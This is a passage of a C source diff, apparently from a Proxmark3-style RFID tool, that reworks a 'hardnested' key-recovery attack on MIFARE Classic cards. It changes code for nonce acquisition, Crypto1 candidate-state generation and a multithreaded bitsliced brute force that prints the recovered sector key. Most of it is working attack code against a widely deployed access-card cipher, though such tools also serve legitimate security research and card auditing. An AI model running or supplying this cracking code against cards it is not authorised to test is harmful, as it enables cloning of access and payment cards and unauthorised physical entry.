 			crypto1_destroy(pcs);
-			return;
+			return true;
 		}
 	}
 
-	printf("Key NOT found!\n");
-	if (write_stats) {
-		fprintf(fstats, "0\n");
+	if (known_target_key != -1) {
+		printf("Key NOT found!\n");
+		if (write_stats)
+			fprintf(fstats, "0\n");
 	}
 	crypto1_destroy(pcs);
+	return false;
 }
 
-static void generate_candidates(uint16_t sum_a0, uint16_t sum_a8)
+static bool generate_candidates(uint16_t sum_a0, uint16_t sum_a8)
 {
 	printf("Generating crypto1 state candidates... \n");
 	
@@ -1285,30 +1308,34 @@ static void generate_candidates(uint16_t sum_a0, uint16_t sum_a8)
 			}
 		}
 	}
-	printf("Number of possible keys with Sum(a0) = %d: %"PRIu64" (2^%1.1f)\n", sum_a0, maximum_states, log(maximum_states)/log(2.0));
+
+	if (maximum_states == 0) return false; // prevent keyspace reduction error (2^-inf)
+
+	printf("Number of possible keys with Sum(a0) = %d: %"PRIu64" (2^%1.1f)\n", sum_a0, maximum_states, log(maximum_states)/log(2));
 	
 	init_statelist_cache();
 	
 	for (uint16_t p = 0; p <= 16; p += 2) {
 		for (uint16_t q = 0; q <= 16; q += 2) {
 			if (p*(16-q) + (16-p)*q == sum_a0) {
-				printf("Reducing Partial Statelists (p,q) = (%d,%d) with lengths %d, %d\n", 
-						p, q, partial_statelist[p].len[ODD_STATE], partial_statelist[q].len[EVEN_STATE]);
+				// printf("Reducing Partial Statelists (p,q) = (%d,%d) with lengths %d, %d\n", 
+						// p, q, partial_statelist[p].len[ODD_STATE], partial_statelist[q].len[EVEN_STATE]);
 				for (uint16_t r = 0; r <= 16; r += 2) {
 					for (uint16_t s = 0; s <= 16; s += 2) {
 						if (r*(16-s) + (16-r)*s == sum_a8) {
 							current_candidates = add_more_candidates(current_candidates);
+							if (current_candidates != NULL) {
 							// check for the smallest partial statelist. Try this first - it might give 0 candidates 
 							// and eliminate the need to calculate the other part
 							if (MIN(partial_statelist[p].len[ODD_STATE], partial_statelist[r].len[ODD_STATE]) 
 									< MIN(partial_statelist[q].len[EVEN_STATE], partial_statelist[s].len[EVEN_STATE])) { 
-							add_matching_states(current_candidates, p, r, ODD_STATE);
+								add_matching_states(current_candidates, p, r, ODD_STATE);
 								if(current_candidates->len[ODD_STATE]) {
-							add_matching_states(current_candidates, q, s, EVEN_STATE);
+									add_matching_states(current_candidates, q, s, EVEN_STATE);
 								} else {
 									current_candidates->len[EVEN_STATE] = 0;
 									uint32_t *p = current_candidates->states[EVEN_STATE] = malloc(sizeof(uint32_t));
-									*p = 0xffffffff;
+									*p = END_OF_LIST_MARKER;
 								}
 							} else {
 								add_matching_states(current_candidates, q, s, EVEN_STATE);
@@ -1317,34 +1344,38 @@ static void generate_candidates(uint16_t sum_a0, uint16_t sum_a8)
 								} else {
 									current_candidates->len[ODD_STATE] = 0;
 									uint32_t *p = current_candidates->states[ODD_STATE] = malloc(sizeof(uint32_t));
-									*p = 0xffffffff;
+									*p = END_OF_LIST_MARKER;
 								}
 							}
-							printf("Odd  state candidates: %6d (2^%0.1f)\n", current_candidates->len[ODD_STATE], log(current_candidates->len[ODD_STATE])/log(2)); 
-							printf("Even state candidates: %6d (2^%0.1f)\n", current_candidates->len[EVEN_STATE], log(current_candidates->len[EVEN_STATE])/log(2)); 
+							//printf("Odd  state candidates: %6d (2^%0.1f)\n", current_candidates->len[ODD_STATE], log(current_candidates->len[ODD_STATE])/log(2)); 
+							//printf("Even state candidates: %6d (2^%0.1f)\n", current_candidates->len[EVEN_STATE], log(current_candidates->len[EVEN_STATE])/log(2)); 
 						}
 					}
 				}
 			}
 		}
 	}					
+	}					
 
-	
 	maximum_states = 0;
-	for (statelist_t *sl = candidates; sl != NULL; sl = sl->next) {
+	unsigned int n = 0;
+	for (statelist_t *sl = candidates; sl != NULL && n < MAX_BUCKETS; sl = sl->next, n++) {
 		maximum_states += (uint64_t)sl->len[ODD_STATE] * sl->len[EVEN_STATE];
 	}
-	printf("Number of remaining possible keys: %"PRIu64" (2^%1.1f)\n", maximum_states, log(maximum_states)/log(2.0));
+
+	if (maximum_states == 0) return false; // prevent keyspace reduction error (2^-inf)
+
+	float kcalc = log(maximum_states)/log(2);
+	printf("Number of remaining possible keys: %"PRIu64" (2^%1.1f)\n", maximum_states, kcalc);
 	if (write_stats) {
-		if (maximum_states != 0) {
-			fprintf(fstats, "%1.1f;", log(maximum_states)/log(2.0));
-		} else {
-			fprintf(fstats, "%1.1f;", 0.0);
-		}
+		fprintf(fstats, "%1.1f;", (kcalc != 0) ? kcalc : 0.0);
 	}
+	if (kcalc < CRACKING_THRESHOLD) return true;
+
+	return false;
 }
 
-static void	free_candidates_memory(statelist_t *sl)
+static void free_candidates_memory(statelist_t *sl)
 {
 	if (sl == NULL) {
 		return;
@@ -1365,21 +1396,6 @@ static void free_statelist_cache(void)
 	}		
 }
 
-size_t keys_found = 0;
-size_t bucket_count = 0;
-statelist_t* buckets[128];
-size_t total_states_tested = 0;
-size_t thread_count = 4;
-
-// these bitsliced states will hold identical states in all slices
-bitslice_t bitsliced_rollback_byte[ROLLBACK_SIZE];
-
-// arrays of bitsliced states with identical values in all slices
-bitslice_t bitsliced_encrypted_nonces[NONCE_TESTS][STATE_SIZE];
-bitslice_t bitsliced_encrypted_parity_bits[NONCE_TESTS][ROLLBACK_SIZE];
-
-#define EXACT_COUNT
-
 static const uint64_t crack_states_bitsliced(statelist_t *p){
     // the idea to roll back the half-states before combining them was suggested/explained to me by bla
     // first we pre-bitslice all the even state bits and roll them back, then bitslice the odd bits and combine the two in the inner loop
@@ -1407,7 +1423,11 @@ static const uint64_t crack_states_bitsliced(statelist_t *p){
 		bitslice_t * restrict lstate_p = _aligned_malloc((STATE_SIZE+ROLLBACK_SIZE) * bSize, bSize);
 	#endif
 #else
+	#ifdef __APPLE__
+		bitslice_t * restrict lstate_p = malloc((STATE_SIZE+ROLLBACK_SIZE) * bSize);
+	#else
 		bitslice_t * restrict lstate_p = memalign(bSize, (STATE_SIZE+ROLLBACK_SIZE) * bSize);
+	#endif
 #endif
 
 		if ( !lstate_p )	{
@@ -1464,16 +1484,12 @@ static const uint64_t crack_states_bitsliced(statelist_t *p){
         crypto1_bs_rewind_a0();
         // set odd bits
         for(size_t state_idx = 0; state_idx < STATE_SIZE-ROLLBACK_SIZE; o >>= 1, state_idx+=2){
-            if(o & 1){
-                state_p[state_idx] = bs_ones;
-            } else {
-                state_p[state_idx] = bs_zeroes;
-            }
+            state_p[state_idx] = (o & 1) ? bs_ones : bs_zeroes;
         }
         const bitslice_value_t odd_feedback = odd_feedback_bit ? bs_ones.value : bs_zeroes.value;
 
         for(size_t block_idx = 0; block_idx < bitsliced_blocks; ++block_idx){
-            const bitslice_t const * restrict bitsliced_even_state = bitsliced_even_states[block_idx];
+            const bitslice_t * const restrict bitsliced_even_state = bitsliced_even_states[block_idx];
             size_t state_idx;
             // set even bits
             for(state_idx = 0; state_idx < STATE_SIZE-ROLLBACK_SIZE; state_idx+=2){
@@ -1498,7 +1514,7 @@ static const uint64_t crack_states_bitsliced(statelist_t *p){
             }
 
 #ifdef EXACT_COUNT
-            bucket_states_tested += bucket_size[block_idx];
+            bucket_states_tested += (bucket_size[block_idx] > MAX_BITSLICES) ? MAX_BITSLICES : bucket_size[block_idx];
 #endif
             // pre-compute first keystream and feedback bit vectors
             const bitslice_value_t ksb = crypto1_bs_f20(state_p);
@@ -1598,7 +1614,7 @@ out:
 		_aligned_free(bitsliced_even_states[block_idx]-ROLLBACK_SIZE);		
 	#endif
 #else
-		memfree(bitsliced_even_states[block_idx]-ROLLBACK_SIZE);
+		free(bitsliced_even_states[block_idx]-ROLLBACK_SIZE);
 #endif		
 		
     }
@@ -1609,16 +1625,25 @@ out:
 static void* crack_states_thread(void* x){
     const size_t thread_id = (size_t)x;
     size_t current_bucket = thread_id;
+	statelist_t *bucket = NULL;
+
     while(current_bucket < bucket_count){
-        statelist_t * bucket = buckets[current_bucket];
-		if(bucket){
+		if (keys_found) break;
+
+		if ((bucket = buckets[current_bucket])) {
             const uint64_t key = crack_states_bitsliced(bucket);
-            if(key != -1){
-                printf("\nFound key: %012"PRIx64"\n", key);
+
+			if (keys_found) break;
+			else if(key != -1) {
+				if (TestIfKeyExists(key)) {
                 __sync_fetch_and_add(&keys_found, 1);
+				__sync_fetch_and_add(&foundkey, key);
+					printf("*");
+					fflush(stdout);
                 break;
-            } else if(keys_found){
-                break;
+				}
+				printf("!");
+				fflush(stdout);
             } else {				
                 printf(".");
 				fflush(stdout);
@@ -1628,75 +1653,90 @@ static void* crack_states_thread(void* x){
     }
     return NULL;
 }
-#define _USE_32BIT_TIME_T
-static void brute_force(void)
-{
+
+static bool brute_force(void) {
+	bool ret = false;
 	if (known_target_key != -1) {
 		PrintAndLog("Looking for known target key in remaining key space...");
-		TestIfKeyExists(known_target_key);
+		ret = TestIfKeyExists(known_target_key);
 	} else {
-        PrintAndLog("Brute force phase starting.");
-        time_t start, end;
-        time(&start);
-        keys_found = 0;
-
-        crypto1_bs_init();
-
-        PrintAndLog("Using %u-bit bitslices", MAX_BITSLICES);
-        PrintAndLog("Bitslicing best_first_byte^uid[3] (rollback byte): %02x...", best_first_bytes[0]^(cuid>>24));
-        // convert to 32 bit little-endian
-        crypto1_bs_bitslice_value32(rev32((best_first_bytes[0]^(cuid>>24))), bitsliced_rollback_byte, 8);
-
-        PrintAndLog("Bitslicing nonces...");
-        for(size_t tests = 0; tests < NONCE_TESTS; tests++){
-            uint32_t test_nonce = brute_force_nonces[tests]->nonce_enc;
-            uint8_t test_parity = brute_force_nonces[tests]->par_enc;
-            // pre-xor the uid into the decrypted nonces, and also pre-xor the cuid parity into the encrypted parity bits - otherwise an exta xor is required in the decryption routine
-            crypto1_bs_bitslice_value32(cuid^test_nonce, bitsliced_encrypted_nonces[tests], 32);
-            // convert to 32 bit little-endian
-            crypto1_bs_bitslice_value32(rev32( ~(test_parity ^ ~(parity(cuid>>24 & 0xff)<<3 | parity(cuid>>16 & 0xff)<<2 | parity(cuid>>8 & 0xff)<<1 | parity(cuid&0xff)))), bitsliced_encrypted_parity_bits[tests], 4);
-        }
-        total_states_tested = 0;
-
-        // count number of states to go
-        bucket_count = 0;
-        for (statelist_t *p = candidates; p != NULL; p = p->next) {
-            buckets[bucket_count] = p;
-            bucket_count++;
-        }
+		if (maximum_states == 0) return false; // prevent keyspace reduction error (2^-inf)
+
+	 	PrintAndLog("Brute force phase starting.");
+
+		clock_t time1 = clock();	 	
+		keys_found = 0;
+		foundkey = 0;
+
+		crypto1_bs_init();
+		memset (bitsliced_rollback_byte, 0, sizeof (bitsliced_rollback_byte));
+		memset (bitsliced_encrypted_nonces, 0, sizeof (bitsliced_encrypted_nonces));
+		memset (bitsliced_encrypted_parity_bits, 0, sizeof (bitsliced_encrypted_parity_bits));
+
+		PrintAndLog("Using %u-bit bitslices", MAX_BITSLICES);
+		PrintAndLog("Bitslicing best_first_byte^uid[3] (rollback byte): %02X ...", best_first_bytes[0]^(cuid>>24));
+		// convert to 32 bit little-endian
+		crypto1_bs_bitslice_value32((best_first_bytes[0]<<24)^cuid, bitsliced_rollback_byte, 8);
+
+		PrintAndLog("Bitslicing nonces...");
+		for(size_t tests = 0; tests < NONCE_TESTS; tests++){
+			uint32_t test_nonce = brute_force_nonces[tests]->nonce_enc;
+			uint8_t test_parity = brute_force_nonces[tests]->par_enc;
+			// pre-xor the uid into the decrypted nonces, and also pre-xor the cuid parity into the encrypted parity bits - otherwise an extra xor is required in the decryption routine
+			crypto1_bs_bitslice_value32(cuid^test_nonce, bitsliced_encrypted_nonces[tests], 32);
+			// convert to 32 bit little-endian
+			crypto1_bs_bitslice_value32(rev32( ~(test_parity ^ ~(parity(cuid>>24 & 0xff)<<3 | parity(cuid>>16 & 0xff)<<2 | parity(cuid>>8 & 0xff)<<1 | parity(cuid&0xff)))), bitsliced_encrypted_parity_bits[tests], 4);
+		}
+		total_states_tested = 0;
+
+		// count number of states to go
+		bucket_count = 0;
+		buckets[MAX_BUCKETS-1] = NULL;
+		for (statelist_t *p = candidates; p != NULL && bucket_count < MAX_BUCKETS; p = p->next) {
+			buckets[bucket_count] = p;
+			bucket_count++;
+		}
+		if (bucket_count < MAX_BUCKETS) buckets[bucket_count] = NULL;
 
 #ifndef __WIN32
-        thread_count = sysconf(_SC_NPROCESSORS_CONF);
+		thread_count = sysconf(_SC_NPROCESSORS_CONF);
+		if ( thread_count < 1)
+			thread_count = 1;
 #endif  /* _WIN32 */
-        pthread_t threads[thread_count];
-		
-        // enumerate states using all hardware threads, each thread handles one bucket
-        PrintAndLog("Starting %u cracking threads to search %u buckets containing a total of %"PRIu32" states...", thread_count, bucket_count, maximum_states);
-		
-        for(size_t i = 0; i < thread_count; i++){
-            pthread_create(&threads[i], NULL, crack_states_thread, (void*) i);
-        }
-        for(size_t i = 0; i < thread_count; i++){
-            pthread_join(threads[i], 0);
-        }
 
-        time(&end);
-        unsigned long elapsed_time = difftime(end, start);
-        PrintAndLog("Tested %"PRIu32" states, found %u keys after %u seconds", total_states_tested, keys_found, elapsed_time);
-        if(!keys_found){
-            assert(total_states_tested == maximum_states);
-        }
-        // reset this counter for the next call
-        nonces_to_bruteforce = 0;
+		pthread_t threads[thread_count];
+
+		// enumerate states using all hardware threads, each thread handles one bucket
+		PrintAndLog("Starting %u cracking threads to search %u buckets containing a total of %"PRIu64" states...", thread_count, bucket_count, maximum_states);
+
+		for(size_t i = 0; i < thread_count; i++){
+			pthread_create(&threads[i], NULL, crack_states_thread, (void*) i);
+		}
+		for(size_t i = 0; i < thread_count; i++){
+			pthread_join(threads[i], 0);
+		}
+
+		time1 = clock() - time1;
+		PrintAndLog("\nTime for bruteforce %0.1f seconds.",((float)time1)/CLOCKS_PER_SEC);		
+		
+		if (keys_found) {
+			PrintAndLog("\nFound key: %012"PRIx64"\n", foundkey);
+			ret = true;
+		} 
+		// reset this counter for the next call
+		nonces_to_bruteforce = 0;
 	}
+	return ret;
 }
 
-int mfnestedhard(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_t trgBlockNo, uint8_t trgKeyType, uint8_t *trgkey, bool nonce_file_read, bool nonce_file_write, bool slow, int tests) 
+int mfnestedhard(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_t trgBlockNo, uint8_t trgKeyType, uint8_t *trgkey, bool nonce_file_read, bool nonce_file_write, bool slow, int tests, uint64_t *found_key) 
 {
 	// initialize Random number generator
 	time_t t;
 	srand((unsigned) time(&t));
 	
+	*found_key = 0;
+	
 	if (trgkey != NULL) {
 		known_target_key = bytes_to_num(trgkey, 6);
 	} else {
@@ -1729,51 +1769,39 @@ int mfnestedhard(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_t trgBloc
 			candidates = NULL;
 		}
 		fclose(fstats);
+		fstats = NULL;
 	} else {
 		init_nonce_memory();
-		if (nonce_file_read) {  	// use pre-acquired data from file nonces.bin
+		if (nonce_file_read) { // use pre-acquired data from file nonces.bin
 			if (read_nonce_file() != 0) {
 				return 3;
 			}
 			Check_for_FilterFlipProperties();
 			num_good_first_bytes = MIN(estimate_second_byte_sum(), GOOD_BYTES_REQUIRED);
-		} else {					// acquire nonces.
+			PrintAndLog("Number of first bytes with confidence > %2.1f%%: %d", CONFIDENCE_THRESHOLD*100.0, num_good_first_bytes);
+
+			bool cracking = generate_candidates(first_byte_Sum, nonces[best_first_bytes[0]].Sum8_guess);
+			if (cracking || known_target_key != -1) {
+				brute_force();
+			}
+
+		} else { // acquire nonces.
 			uint16_t is_OK = acquire_nonces(blockNo, keyType, key, trgBlockNo, trgKeyType, nonce_file_write, slow);
 			if (is_OK != 0) {
+				free_nonces_memory();
+				//free_statelist_cache();
+				free_candidates_memory(candidates);
+				candidates = NULL;
 				return is_OK;
 			}
 		}
 
-		Tests();
-
-		PrintAndLog("");
-		PrintAndLog("Sum(a0) = %d", first_byte_Sum);
-		// PrintAndLog("Best 10 first bytes: %02x, %02x, %02x, %02x, %02x, %02x, %02x, %02x, %02x, %02x",
-			// best_first_bytes[0],
-			// best_first_bytes[1],
-			// best_first_bytes[2],
-			// best_first_bytes[3],
-			// best_first_bytes[4],
-			// best_first_bytes[5],
-			// best_first_bytes[6],
-			// best_first_bytes[7],
-			// best_first_bytes[8],
-			// best_first_bytes[9]  );
-		PrintAndLog("Number of first bytes with confidence > %2.1f%%: %d", CONFIDENCE_THRESHOLD*100.0, num_good_first_bytes);
-
-		clock_t time1 = clock();
-		generate_candidates(first_byte_Sum, nonces[best_first_bytes[0]].Sum8_guess);
-		time1 = clock() - time1;
-		if ( time1 > 0 )
-			PrintAndLog("Time for generating key candidates list: %1.0f seconds", ((float)time1)/CLOCKS_PER_SEC);
-	
-		brute_force();
+		//Tests();
 		free_nonces_memory();
 		free_statelist_cache();
 		free_candidates_memory(candidates);
 		candidates = NULL;
-	}	
+	}
+	*found_key = foundkey;
 	return 0;
-}
-
-
+}
\ No newline at end of file